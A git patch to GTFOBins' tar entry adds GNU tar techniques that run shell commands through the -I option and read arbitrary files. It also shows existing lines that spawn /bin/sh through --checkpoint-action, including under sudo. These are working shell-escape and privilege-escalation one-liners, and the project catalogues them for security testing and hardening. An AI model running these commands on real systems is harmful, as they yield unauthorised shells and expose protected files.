From 0d786940c458d1f99f5ba1fe3e34fbe7c38019cd Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Wed, 13 Jun 2018 10:35:26 +0200 Subject: [PATCH] Add tar execute-non-interactive and file-read --- _gtfobins/tar.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md index f2afc76..19fd34d 100644 --- a/_gtfobins/tar.md +++ b/_gtfobins/tar.md @@ -2,6 +2,9 @@ functions: execute-interactive: - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh + execute-non-interactive: + - description: This only works for GNU tar. + code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' sudo-enabled: - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh suid-limited: @@ -13,4 +16,9 @@ functions: TF=$(mktemp) echo data > "$TF" tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P + file-read: + - description: This only works for GNU tar. + code: | + LFILE=file_to_read + tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' ---